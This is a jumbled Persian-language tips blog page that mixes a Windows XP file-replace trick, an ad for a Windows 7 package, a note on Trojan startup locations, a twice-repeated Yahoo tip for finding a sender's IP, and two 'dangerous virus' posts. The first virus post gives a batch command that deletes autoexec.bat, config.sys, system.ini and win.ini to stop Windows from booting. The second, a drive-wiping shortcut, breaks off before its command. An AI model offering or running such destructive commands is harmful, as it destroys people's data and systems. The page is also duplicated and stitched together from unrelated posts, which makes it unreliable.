عملکرد این دکمه ها واضح است:دکمه Yes جهت تایید جایگزینی، دکمه No جهت عدم جایگزینی و دکمه Cancel نیز جهت لغو عملیات به کار می رود.همچنین دکمه Yes To All زمانی کاربرد دارد که شما قصد جایگزینی چندین فایل را دارید؛ با فشردن این دکمه دیگر پنجره تاییدیه نمایش داده نخواهد شد و به صورت اتوماتیک همه فایل ها جایگزین می شوند.اما اکنون اگر مقداری دقیق شویم، احساس می کنیم در این میان جای یک دکمه و عملکرد خالی است!دکمه ای که عملکردی عکس Yes to All داشته باشد و بتوانیم آن No to All بخوانیم.فرض کنید به هنگام انتقال چندین فایل قصد ندارید که هیچ فایلی جایگزین قبلی ها شود.در این زمان ناچار خواهید بود به تعداد فایل های قابل جایگزین برروی دکمه No کلیک کنید و مایکروسافت را به خاطر قرار ندادن دکمه No to All در این پنجره لعنت کنید!در این زمان اکثر کاربران دست به دامن نرم افزارهای جانبی مرتبط، نظیر Tera Copy و Sync Toy می شوند.اما واقعاً نیازی به این کار نیست!با استفاده از ترفندی بسیار جالب و کاربردی که هم اکنون برای شما بازگو خواهیم کرد، می توانید بدون نیاز به هیچ ابزار جانبی و با راهی ساده، علکرد No To All ر ادر پنجره جایگزینی فایل در ویندوز XP شبیه سازی کنید.
بدین منظور:
پس از نمایش پنجره Confirm File Replace، در صورتی که قصد داشته باشید عملی مشابه با عملکرد No to All را انجام دهید، کافی است کلید shift را بر روی کیبورد گرفته و نگاه دارید، سپس با استفاده از ماوس برروی دکمه No کلیک کنید.با این کار گویی بر روی دکمه فرضی No to All کلیک کرده اید و نتیجه عدم جایگزینی و همگی فایل ها خواهد بود.
منبع:شاهدجوان شماره52
نسخه نهایی و فاینال ویندوز 7 Ultimate نسخه Retail تاریخ 22 اکتبر
نسخه نهایی و فاینال ویندوز 7 Ultimate نسخه Retail تاریخ 22 اکتبر نسخه 32 و 64 بیتیسرانجام در تاریخ 22 اکتبر 2009 همانطور که از پیش وعده داده شده بود مایکروسافت نسخه نهایی Retail ویندوز 7 را نیز منتشر کرد تا تمام انتظار ها برای انتشار ویندوز 7 پایان یابد !
تا پیش از این مایکروسافت به شدت در مورد ویندوز 7 مخفی کاری می کرد. هرچند که تصاویری از برخی نرم افزارهای تغییر یافته سیستم عامل جدید منتشر شده بود. اما با ارایه نسخه بتای ویندوز 7 مشخص شد سیستم عامل جدید جزو عمده ترین تغییرات ویندوز از زمان روی کار آمدن ویندوز 95 بوده است. اولین ویژگی که برای بسیاری از کاربران بسیار مهم می باشد معماری زیر بنایی ویندوز 7 می باشد که دیگر مانند ویستا مجبور به جستجو جهت درایور های مخصوص و مشکلات عدم نصب نرم افزار ها و ... وجود نخواهند داشت و به گفته مایکروسافت این مشکلات در این نسخه از ویندوز حل شده است! در این نسخه از ویندوز شرکت مایکروسافت با تحلیل هایی که از کاربران خود به عمل آورد سعی نمود ویندوز7 را بهینه نماید که این بهینه سازی در محیط کاربری و سایر قسمت های واین نسخه از ویندوز ارائه شده است.
نسخه Ultimate N Retail + مدیا پلیر Windows Media Player محتویات بستهی ویندوز 7 نسخه نهایی:
– نسخهای Genuine ویندوز با قابلیت آپدیت از سایت مایکروسافت
- نسخه Ultimate N Retail انتشار رسمی در تاریخ 22 اکتبر 2009
- 7 ساعت آموزش جامع ویندوز 7 از شرکت لیندا (480MB)
– آموزش تصویری و فارسی نصب ویندوز 7 !
- 15 کتاب الکترونیک مفید آموزشی ویندوز 7 ! (450MB)
- مجموعه فونتهای فارسی مخصوص استفاده در ویندوز 7! (12MB)
- مجموعه پوستهای ویندوز7 ! (50MB)- مجموعه ی بیش از هزاران Gadgets ویندوز 7 از جمله تقویم فارسی و... (280MB)
- نسخه کامل Windows Media Player مدیا پلیر . (300MB)
- دارای اتوران اختصاصی و در بسته بندی نفیس و شکیل (همانند تصویر ابتدا صفحه)
- و...
ادامه مطلب...
نوشته های دیگران ()
نویسنده متن فوق: » کهکشان ( یکشنبه 90/2/11 :: ساعت 10:20 صبح )
روشهای Trojan در هنگام راه اندازی
روشهای راه اندازی استاندارد
اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده میکنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راهاندازی خواهد داشت، بگونهای که در زمان راهاندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راهاندازی شامل کلیدهای اجرایی registry ، فولدر راه اندازی ویندوز، Windows Load = یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز میباشند.
روشهای راه اندازی خطرناک
پیدا کردن IP فرستنده ایمیل در سایت یاهو
با استفاده از ترفندی که به شما معرفی خواهیم کرد میتوانید بدون نیاز به نرم افزار خاصی و تنها در محیط سایت یاهو و با اندکی تنظیمات ، IP شخصی که برای شما ایمیل فرستاده را بیابید.
بدین منظور:
ابتدا به صفحه ایمیلتان در یاهو بروید و سپس از بالای صفحه سایت گزینه Options را انتخاب کنید.
سپس به قسمت General Preferences بروید. در صفحه باز شده در بخش Messeges و در قسمت Headers ، تیک گزینه Show all headers on incoming messages را بزنید. سپس در پایین صفحه بر روی Save کلیک کنید.
حال اگر یکی از ایمیلهای خودتو رو چک کنید در قسمت نام فرستنده میتوانید IP و اطلاعات دیگری از او را مشاهده کنید.
پیدا کردن اطلاعات یک IP
پیدا کردن IP فرستنده ایمیل در سایت یاهو
با استفاده از ترفندی که به شما معرفی خواهیم کرد میتوانید بدون نیاز به نرم افزار خاصی و تنها در محیط سایت یاهو و با اندکی تنظیمات ، IP شخصی که برای شما ایمیل فرستاده را بیابید.
بدین منظور:
ابتدا به صفحه ایمیلتان در یاهو بروید و سپس از بالای صفحه سایت گزینه Options را انتخاب کنید.
سپس به قسمت General Preferences بروید. در صفحه باز شده در بخش Messeges و در قسمت Headers ، تیک گزینه Show all headers on incoming messages را بزنید. سپس در پایین صفحه بر روی Save کلیک کنید.
حال اگر یکی از ایمیلهای خودتو رو چک کنید در قسمت نام فرستنده میتوانید IP و اطلاعات دیگری از او را مشاهده کنید.
پیدا کردن اطلاعات یک IP
ساخت ویروسی ساده ولی خطرناک!
قصد داریم ترفندی خطرناک (!) را به شما معرفی کنیم که با استفاده از آن می توانید بدون نیاز به نرم افزار خاصی و تنها با استفاده از Notepad ویندوز ویروس خطرناکی بسازید. با اجرای این ویروس ، کامپیوتر مورد نظر Reset شده و دیگر ویندوز آن بالا نمیاید! لازم به ذکر است که این ترفند تنها جنبه آموزشی داشته و هر گونه استفاده نابجا از آن به عهده خود فرد میباشد.
ابتدا Notepad ویندوز را باز کنید. سپس این عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس فایل رو با پسوند Bat . ذخیره کنید.
ساخت یک ویروس ( تروجان ) ساده ولی خطرناک
این ویروس چیز سختی نیست ولی خیلی خطرناکه و باعث میشه تنها با یک کلیک کل اطلاعات درایو مورد نظر پاک بشه.
اول از همه روی دسکتاپ رایت کلیک کنید بعدش New ShortCut بسازید. یه صفحه باز میشه در اون بنویسید:
.::مرجع کد آهنگ::.
.::دریافت کد موزیک::.